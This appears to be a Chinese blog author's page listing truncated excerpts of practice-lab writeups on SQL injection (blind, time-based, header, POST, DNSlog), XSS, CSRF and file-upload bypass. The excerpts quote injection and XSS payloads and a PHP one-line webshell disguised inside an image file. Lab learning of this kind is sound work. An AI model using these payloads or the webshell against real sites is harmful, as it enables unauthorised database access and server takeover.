Track 实习学员

忆梦昔

0关注
0粉丝
18文章
返回网站首页

您已发布 18篇文章作品写文章

Lucifer-延时注入Writeup

1进入靶场url输入?id=1’存在注入点输入?id=1’ or 1=1%23显示登录成功?id=1’ and if(length(database())>5,sleep(5),1)%23过了5秒显示了画面,数据库的长度大于5 然后猜数据库的名字If(Ascii(substr(database(),1,1))=115,sleep(5),1)%23……最终数据库的名字为securit

 2019-3-2
 0 
 33 

Lucifer-CSRF Writeup

进入CSRF靶场首先看到了是dedeCMS然后百度dedeCMS CSRF漏洞,有一篇文章https://xz.aliyun.com/t/2237首先会在inc文件中写入一句话这是payload,当然要登录,知道管理员的账号和密码,账号是admin,密码为admin123http://120.203.13.75:8123/csrf/uploads/dede/sys_verifies.php?act

 2019-3-2
 0 
 33 

Lucifer-存储型XSS Writeup

进入存储型XSS靶场发现是FineCMS然后我们百度一下FineCMS存储型XSS的漏洞进入登录界面在后面拼接<script>alert(1)</script>弹窗,然后插入XSS平台payload查看XSS平台 ,得到flag

 2019-3-2
 0 
 45 

Lucifer-dom型XSSWriteup

进入dom型XSS靶场首先输入XSS经典弹窗语句<script>alter(1)</script>逢空就插发现没有用发现是被html实体化了,然后感觉无从下手了忽然看到有个位置可能和url中传参有关系果然能把url参数返回进一步尝试<script>alert(1)</script>注意不要使用Chrome浏览器会拦截果然弹窗了还有一种方法,就是将&l

 2019-2-25
 0 
 52 

Lucifer-反射型XSSWriteup

进入反射型XSS靶场很鬼畜,但还得看下去既然是XSS的题目,先使用通用的<script>alert(1)</script>发现没有什么反应,然后审查元素发现没有进行闭合,于是在前面加上双引号,后面加上注释//感觉乍一看没有什么问题,但用html编辑查看发现双引号被html实体化了尝试使用单引号发现被转义的惨不忍睹,尝试一下oninput,就是在输入的时候被触发输入’onin

 2019-2-25
 0 
 13 

Lucifer-head注入Writeup

进入head注入靶场1、  需要安装chrome的modheader,插件的网址为http://chromecj.com/web-development/2018-04/1029.html下载完会显示无法安装,需要打开开发者模式,就可以安装成功了进入靶场,1',updatexml(1,concat(0x7e,(select database()),0x7e),1),1)#显示’~

 2019-2-24
 0 
 25 

Lucifer-盲注Writeup

1.  要求输入id,输入?id=1’观察并输入?id=1’ or 1=1%23,%23代表#注释显示登录成功下一步需要猜字段个数,输入?id=1’order by 3%23得到有三个字段猜测数据库名的长度?id=1%27%20and%20length(database())<=8%23数据库名长度为8测第一个字符?id=1%27%20and%20ascii(substr(data

 2019-2-24
 0 
 12 

Lucifer-post注入Writeup

这次的题目为post注入,共三道题1、进入靶场,看见有个表单,想到post注入在username尝试使用万能密码进行注入,输入’ or 1=1 #显示sql语句和用户名和密码用order by猜测字段的个数,从10开始猜,使用二分法,在’ order by 2 #时正确,有两个字段使用'and 1=2 union select 1,database()#爆出数据库继续' and 1

 2019-2-24
 0 
 10 

Lucifer-DNS注入Writeup

DNSlog靶场无回显但可以DNSlog注入进入靶场输入?id=1,能正常显示,再输入’测试有无注入点正常,有注入点,猜测字段个数发现有waf,用最简单的方式,添加子目录1.txt,为信任的文件后缀,就可以绕过waf了使用联合查询,把想要的库名、表名等显示在DNSlog平台上,会有访问记录http://120.203.13.75:8120/index3.php/1.txt?id=1%20and%2

 2019-2-23
 0 
 23 

Lucifer-文件上传漏铜Writeup

文件上传漏洞制作图片马,选一张自己喜欢的图片(越小越好)和一句话木马(选择的是php的一句话木马,<?php @eval($_post[‘a’])?>)的文件,打开cmd,用copy命令,copy 1.jpg/b+1.txt baby.jpg就成功做出了一个图片马Pass-01         前端验证绕过

 2019-2-23
 0 
 8